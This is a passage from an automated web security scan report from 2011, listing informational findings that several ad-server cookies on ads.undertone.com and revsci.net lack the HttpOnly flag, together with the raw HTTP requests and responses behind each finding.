Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_RXmH="MLsXtSMNJjhrJoHUG+rUxPALFPJg7aBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyOT+GUT9nKm6Uzd+LOs5qvUnENSYlaK0KznMNqgeVc7u11QLOt3H88u2n9J3K7ReVCPIvh9QMt5HFcvzlWMwCQvebSXlqBAu2RernYAut1NC6VxocQ4vI6YkKntNNFsTWurWvRLDQLcNSXvlo3q/IRrdGQU1wsVK2NaCDH6IkICSQMIi0mUJ2854sQbPCwbh0hzgPeYW5npxqXDrzKYQtXwMh261gIkuwsSjlh3ol5pPB8GHLODEm8H0ER2S9bWhnjh2tYo3iNC/lc4NLR5bHSiz1gdQzMLiSEbthA1LF+XISbspf4DHmymXcR3VSpWILtnCQwQN7hPGjaSKBzHNrko/5L3bMn9pBa6iFAEYhWP9BcF1F/i/zA/mxUODAkEVqHBJAW2hZvhtGtAbh6CxHCF590BUBYG1yzKp9meiHIHCaxsD3YWnIICKbkj4roH58T0PgLLzpZOuhSmgQvfVu8lS4fXzPRPlVk46rFWtdPVp9WNUKKNnblO4g6edoZMDNTHSve9WufpCPpkNsm5knJO4jO2Rn+w4MVqWp+/RlzhctdBgy7HqD4eQ6cVjIKEu3/phNdOSm5HMW0aFbYP3TuDjvAHMFJlBK4uBkL5Y1PKDMJV52dj5ZZAw8rW7AzPEzb4IPEP16HLfxV+g2yepzhdcGw3T3txYnFBZzd5Pp3hjrZtu1U69wCo9hgxKJG+BKk6kuBNZzQueRAMNzjrbkbE8zUi6EE1/RZoy4DGKY2NX9daazQm+XxGJes3OVrmAE5MsF6ZbUehi0of52dAwKyLkhmCL0I41uDlKvplCwcn4y06lg1h7jbxNf3aAhhjP8c/nPrsQg36KnFeCdkfIkyBe2kGXVRvl0gbIf/iNINeNuQNZgSandggonOrKXUtpC6Af7g694/87YlYLxmxqqRx9r0w+v05m7jNyS0zc6f4ZMw8g4pOgMMCbuE/NbDbXCtYYYjLUCP1NPutzZg2xYvgQ7BaTNOb4I3MBo7yxdbDq2n8dfZ8mOgQ1OGRoTjXjU9n/GaPEJvnrtHTtNPwDlw3ZmdMtNM+kJOfzwCLZ25xzFca5ZW0G9Ge1SkeCpQg62Ys6Uq4APCtUoG5fHvoIbTyh/oFjx5aam/gy2De3dPig88m9TdT1MpATdXXGm3gQW08DfgV7ZZK03srjxMvr4NUW+loKQUJs7AaPLF1vHjFfaSGn/fU4s+o+p1DGLJztcBPxJYm88RhIKEWcdZGqJflCuuD6t5UPS83XK+DDraRqA+U6FmZieutO26gVCGk71RTmD9Bh7fOgp7+5TwBFn1mm6NlX1Cn9kPiPyKy00fK3p9iJ3P2xj9w6+QFqDqb6etvHf2E8vb4oyjLaTNWBh5CBPOIQMDw1plT/HCto6JhNaitu5lv0zFEiT7IBCE7WI3JLhVo+pvYrxrta2PYndn+yK79yZuGwH+5yjJuylm9VtakAAY20JjiMK8yuOQM+SOxDds0F0vprgY5Y7xH+ANu4srSuqsysS9O+fpQ7OvNJ+Er9qxA=="; rsi_us_1000000="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"; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpn3tsfwP3C13ELVR0CQCV8tpujhUfWhmS6NTgEmCnCZ++Kg6mfGQNWB4S7E4rk4kRS6EemAcxwlypsWECT4LBvY3ZVyCrts6XqdTZLTTjsU1Ta44fEsrqkF3QR8AOUEazdr73Yx/v5GsElQg2z/OxHimPEHU8H9vtdJVlTWa3RAtda3D/U67y/ubm7yMeD05sVGFPn1GloHXbGc6QArtZrs4LlIZSa0c/3WWqlPgJBCVF4jRqC3hM+vRmU6J2FYvvoyoAQBFW2qGWrCcQIr4DGDGoFFqkTIKf0vEd0h2I6LjYGgX1CvS21MywhPm/F6pyJL6pR60KkkHrWCMq8m9de56wmRRDdiuvI4U2dNhS1sPwTc8AJmULpuJf7j/y0mC8xQDfPOYuNpl9d48zBA1Db6kf5rrOZgz6Nsv6GDaVXGwPrqMpwbxTqEKyRJm4qd1YU0pC/+3cjUmDytTEVvwfzUhTic/Yr8YO74Yh1GljmAeoHUE/nBX5aURGIkYgXrs6Vc2sH3rBMi03t9mq/cL9Nj1G7oPtwlfosCDCW1s45wrzwmX1BVmtF3VeqdswFUzK7GoiF4ncwW7Thw974oEX5k9uHeLK9ubMWgFddOp5E+U1ixsBTiJzizMEic5ZimkGUiiA2SDkdPaPqcNbExXL9CUw8sCLmtGOg4b6dKWsniQFGvSsZr6SD0D6vrTL50s25Z6YG/uMCBW29BBgPISdd4nOKGOBBDGl8qd8YIQyBcJweaFIdSxXwooYodaQ4Y4xqzUi9fxCOPJydOz85nIM8KNhnKtW3HL74kCi591Z9kc08IWXL3x3rtVjY4YjjFdvlZH1bFa10yT8hjf9E2L44N2PoWw5Md/XVaVAlebEvmdjBjZ0hUKsaUOX1JzVhkBQ+KGzcx+sotktzYFcOwoEeKHZPtz5HryZmzu47uVTDhLOkBldHf+vrTGvT1QrAvsxqkQTDyPIQyQGBzDHQvl0TLZlZXMkeHlOYy2ULroOabknOi4aktm3dGtOGl+KB/AS3HyzbdCgi6BKGaN8PGmmeS9UIptYOh+SSzHDfIk1Xhl2hjQbO/ugEdqDYDzxTRBXRudZxYKFkueHvhVFlPQH83WEmQ1QD9yVKDYz8hbSfvcvIc4xblteaZg3Cr1RoeqL01TISneJPTII93k4HyMtQO9vpfkxofTWPDqHGQN0flp+qZ9RDQafFcsZZ/yMHHKtC2FnoFyZMbweX76sJrCybzpidSGnfinvvckpsBmXXqWv/WXgJq0JYZxkXmgSpOUan+W6t2NLXZQk6uBcMTaMyS6ZIRJtPwG1V5ojzmtrOP1xJjVHroOP37vmPnBK7aplXTPZ7APFyxXHub+Sh7ScDaetlyS3joMbfIhHGNBDCxxt7CMI4OkocONePsFdRy4lLyEbAB69B4uZJRgboLOgUIpb9kVC1/fb5RAacwDUEBee7IwtZ8I4i+4+Es2Vz5qkMbQsE04r8/eirLSb86MAm/Kc+2GigTWoHGK5AYrpfgPfB2AYZn7fdaAY0GB9B3W1mmPM0N2m7oUr0GzTCDA8llTSp/W++zggVRL5RNuhm4t23/CGDzIFUjHnwYa6q4lbFRwblEuM6P8Bm997Ei12i+TbSga+YKk6qJI/1rqyenbNJhmvKp+VjvEW4DWQkDwnPTRd0hx4NMbkkWHgjaogiL2OKACU7kfOe05M28O8IhCEnkgatzwM24rVjViBkVbYcIGr2s6sN4nM6JXd6Y42yYDFbOWR+7XVbVuMKJiTwYiIg+9uZ+JgSNIPedCW7IEltpSm3gGVxp1cnmwgOzdoycrFzWMjJhorPz+oofpq7CZiZwecNku6gOEQtxXSbfUjQrno=; rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kpxr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kpxr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SZJZ="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4umiKbjeSRFG1WGV7v3P2wuhddhrqwvMRjk0BenkJXocfzEwn+Nqhfv9uk/5yFLDCoDEiXP/hOV/sixRxjRF5rWB9KnHODU3B/yiV31fU9eC47+7M/+n0rHdBD4ZxTqL+i57Kfedz/cOyQJ/yqrT8WH56MJW2k/Y9CySxYR40lREQTsrWG7iHX/ZXcgbRha1qYshbnj41ek4M+T6JcKCxkbH15JB/en3mXv1AsBpaE/NatqWqHNyHQHJfAhdEnyH1+AAopspuM3siXVWxrdxhMapoJxsBhSSal7CXpZYG+uwKX6/HBBoo1QiOnTYinh15lebN38dWtzvNR2O+WFyXzCozolPtxDwm0dHcYAcuFfIr8QFcmjsXeoy54UcbFQfkl9uHXtLBbnuMbnFxbNwaHE//LzUfc5hb2GScAS+tt37fQYS17jN3hBQaRrUBkzt7rfFLMsvMHbbyYv3KfLRCE3w09MCuPqRLiZY3ytjjsY6apkPVVkOf7RGTxh3YfEL6eFDcKTCpWqfnef4KW5APHU9wMNAvLlgroCAf/NhO2U3Y/GfwP4tEvTYLJN23RLPRD8S8OCoPmsUEcTjYSdXrAa+japzdcP3mqBhAwNNo4MEXKPVwsppVJe0EX3fGU/z4laDN06Bl4R1L1Ud+xKxsSeEJJVA4fdmtNkncbfRp/AuusRsiMiJmM8wEh9cHMeuWvC/1JGAquOj+tGnyCfumeubLuDosKPCGVUatVhMm8Un4rKjml83L7IXGsViPmi+mSBR6ghqHQjD4aMO749hTnc8Y8YtOlKc7ILWPtzWq1qxsPOFXM/G/zC/lKJdZpuX37zzVp/oTsbOePRvoa6pns4A4/pYni1f1cOWO4QmossHVIGr7gqKt2dJIcAbrZspS2DHtJse2yV6D948mxs5iyfph8iLvlPiGAk70vnVSIWhOxIRAf1Hubw1TQuNP9oTufqhhBrP9GvCENRUI1T3eVdbDJcIJdZFtu6QHj8+l4WNRDiGqpozNwcSCkTIbu9FwpFhC0Hh4P0m7hqR4Kv6Lei7atV+4x3ApSzcU30KQIJYd24qeaXX0AM2NZKIsIh/PCCWU30b2w1A+4XoXLNY9hpJjWMQAk2uIG/HXtcco1ZuZjVGniEqwPjgK3X0T7ZWByLmJvp8X3Klk8GibfUeyNvNx6XGzxASGUkyGEWOfMUp9fjZ6IpP+EVsoSlBDHB+J8FDy1Tna3CDV1xsTytG+31h1s3uvGX6QIQ3GbvJENudrwhqTQb3dewEm3Rg/SAyb0xljjjF/rEoV/y1xhGU6vwWSmXhsTq0YU2p5nRFroYcOuwzmqM5qplSuVq/oPqIEHSWbSxqLpJLHzwjNOZLwAqynbTkWi6aUeO3RHvwfmwQ70KqDFHoSqXTseyacFksSkrt04Fkkh7y+uzYAwdvOl7Jd3QinEFa0FNW49rkGHj3tqQ7u6bJXw+d0dwc5+xla32jQflwdmRpSh1ssB1xZMcK7cy3AYW/iT+NpHbx"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=699224&t=2
Content-Length: 0
Date: Tue, 19 Jul 2011 14:57:47 GMT


14.27. http://ads.undertone.com/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /fc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fc.php?dp=8&pid=D,T HTTP/1.1
Host: ads.undertone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UTID=f3b4b703c00b47eb93300bd230973543; UTPROFILES=15174%23288%3A6%2C2%7C1022%3A6%2C2%7C1023%3A6%2C2%7C1671%3A7; A28X=3sctnLo1Ii2YRYsbSAhSEkGPDnyiF-Kjl82XJIrWXTxZ7EhcgAcQ0cA; UTLIA=223791.lockef-13588; _UTLIA[174266]=lolljj-16565; _UTCBLOCK[28159]=1311108175; _UTSCCAP[28159]=1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:43:04 GMT
Connection: close
Set-Cookie: UTID=f3b4b703c00b47eb93300bd230973543; expires=Wed, 18-Jul-2012 20:43:04 GMT; path=/
Set-Cookie: UTPROFILES=15174%23288%3A6%2C2%7C1022%3A6%2C2_1%2C2%7C1023%3A6%2C2_1%2C2%7C1671%3A7; expires=Mon, 17-Oct-2011 20:43:04 GMT; path=/

GIF89a.............!.......,...........D..;

14.28. http://ads.undertone.com/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=174266&campaignid=28159&zoneid=16565&UTLIA=1&UTCBLOCK=86400&UTSCCAP=5&ptm=1671&cb=6ae6c1caed774ca287c93a7d3ec3c5db&bk=lolljh&id=2vaimk2c7zwrks2trxj9vaxbr HTTP/1.1
Host: ads.undertone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
